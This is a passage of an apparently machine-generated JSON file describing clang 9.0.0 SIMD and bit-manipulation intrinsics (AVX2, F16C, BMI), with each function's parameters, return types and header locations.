"/usr/lib/clang/9.0.0/include/avx2intrin.h:551:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:557:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:569:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:575:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:581:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:587:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:593:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:599:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:605:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:611:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:617:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:623:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:629:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:635:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:641:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:647:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_unpackhi_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:653:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:659:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:665:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:671:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:677:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:683:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:689:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:695:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_xor_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:701:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_stream_load_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:707:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__V", "type": { "tag": ":pointer", "type": { "tag": "__m256i" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:714:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_broadcastsd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:720:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:726:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_broadcastsd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:732:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_broadcastsi128_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:738:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:752:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:758:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:764:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:770:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_broadcastb_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:776:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_broadcastw_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:782:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:789:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:795:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_permutevar8x32_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:801:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_permutevar8x32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:810:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskload_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:829:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskload_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:835:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":pointer", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskload_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:841:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskload_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:847:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":pointer", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskstore_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:853:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_maskstore_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:859:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":pointer", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_maskstore_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:865:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_maskstore_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:871:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":pointer", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:877:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_sllv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:883:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:889:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_sllv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:895:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:901:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_srav_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:907:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:913:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_srlv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:919:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:925:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_srlv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx2intrin.h:931:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_cvtsh_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/f16cintrin.h:39:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/f16cintrin.h:110:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_cvtph_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/f16cintrin.h:154:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "__tzcnt_u16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:49:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "function", "name": "__andn_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:68:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__bextr_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:91:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_bextr_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:116:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__Z", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blsi_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:133:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blsmsk_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__blsr_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:167:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__tzcnt_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:183:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_tzcnt_32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:199:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__andn_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:231:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__bextr_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_bextr_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:279:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__Z", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blsi_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:296:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blsmsk_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:313:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__blsr_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:330:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__tzcnt_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:346:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_tzcnt_64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmiintrin.h:362:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":long-long", 